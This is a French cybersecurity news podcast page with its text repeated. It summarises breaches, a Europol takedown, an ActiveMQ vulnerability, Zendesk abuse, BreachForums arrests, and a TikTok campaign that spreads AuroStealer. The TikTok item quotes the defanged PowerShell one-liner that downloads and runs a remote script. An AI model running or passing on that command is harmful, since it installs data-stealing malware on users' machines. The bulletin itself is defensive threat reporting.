Sign up to save your podcasts
Or
Share RadioCSIRT - Votre actu cybersécurité du vendredi 17 octobre 2025 (Ép.457)
Share to email
Share to Facebook
Share to X
Share to email
Share to Facebook
Share to X
Or
RadioCSIRT - Votre actu cybersécurité du vendredi 17 octobre 2025 (Ép.457)
Bienvenue dans votre bulletin cybersécurité du jour ⚡️
🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite
Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré. La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884.
👮 Europol — Démantèlement d’un réseau international de SIM-box
L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.Deux sites web, gogetsms.com et apisim.com, ont été saisis.Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau.
📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539
Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.Score CVSS 9.8, sans privilèges ni interaction. Corrigée en version 2.4.0, supprimant le mécanisme vulnérable.
🎬 TikTok — Campagne PowerShell diffusant AuroStealer
Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données. Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque.
📨 Zendesk — Détournement massif des workflows de support
Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk. Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles. Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ».
⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire
Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière. Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/
https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/
https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/
https://cyberpress.org/tiktok-powershell-malware/
https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/
https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm
📞 Partagez vos retours :
📱 07 68 72 20 09
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT
View all episodes
By Marc Frédéric GOMEZBienvenue dans votre bulletin cybersécurité du jour ⚡️
🛫 American Airlines / Envoy Air — Fuite de données Oracle E-Business Suite
Envoy Air, filiale d’American Airlines, confirme une compromission sur son application Oracle E-Business Suite, après la revendication du groupe Clop.Selon la compagnie, aucune donnée client sensible n’a été touchée, mais un volume limité d’informations commerciales a pu être exfiltré. La campagne d’extorsion est liée à l’exploitation d’une faille zero-day, la CVE-2025-61882, précédant un correctif discret d’Oracle sur la CVE-2025-61884.
👮 Europol — Démantèlement d’un réseau international de SIM-box
L’opération SIMCARTEL a permis de démanteler un service illégal de location de cartes SIM.1 200 dispositifs et 40 000 SIM étaient utilisés dans plus de 3 200 fraudes, causant 4,5 millions d’euros de pertes.Deux sites web, gogetsms.com et apisim.com, ont été saisis.Sept personnes ont été arrêtées, et plus de 49 millions de comptes frauduleux ont été créés à travers ce réseau.
📦 Apache ActiveMQ — Vulnérabilité critique CVE-2025-54539
Une faille critique d’exécution de code à distance affecte Apache ActiveMQ NMS AMQP Client jusqu’à la version 2.3.0.Origine : désérialisation non fiable de données (CWE-502) lors de connexions à un broker AMQP malveillant.Score CVSS 9.8, sans privilèges ni interaction. Corrigée en version 2.4.0, supprimant le mécanisme vulnérable.
🎬 TikTok — Campagne PowerShell diffusant AuroStealer
Des vidéos TikTok diffusent de faux outils d’activation logicielle, incitant à exécuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci télécharge un script malveillant, puis un exécutable AuroStealer chargé de voler des données. Persistance via tâches planifiées Windows et auto-compilation à la volée via csc.exe, permettant une exécution en mémoire sans trace sur disque.
📨 Zendesk — Détournement massif des workflows de support
Des acteurs malveillants exploitent l’absence d’authentification dans certaines instances Zendesk. Résultat : des milliers de messages automatiques envoyés via les domaines clients, saturant les boîtes mail cibles. Les tickets anonymes et les déclencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie d’abus distribué « many-against-one ».
⚖️ Affaire BreachForums — Entre défi technique et dérive judiciaire
Cinq individus ont été interpellés en France entre février et juin 2025, soupçonnés d’être liés à BreachForums et à plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats décrivent un mélange d’immaturité et de savoir-faire technique, sans motivation financière. Malgré ces arrestations, le site a brièvement rouvert en juillet avant d’être de nouveau fermé par le FBI et la BL2C.
⚡️ On ne réfléchit pas, on patch !
📚 Sources :
https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/
https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/
https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/
https://cyberpress.org/tiktok-powershell-malware/
https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/
https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm
📞 Partagez vos retours :
📱 07 68 72 20 09
🌐 https://www.radiocsirt.org
📰 https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT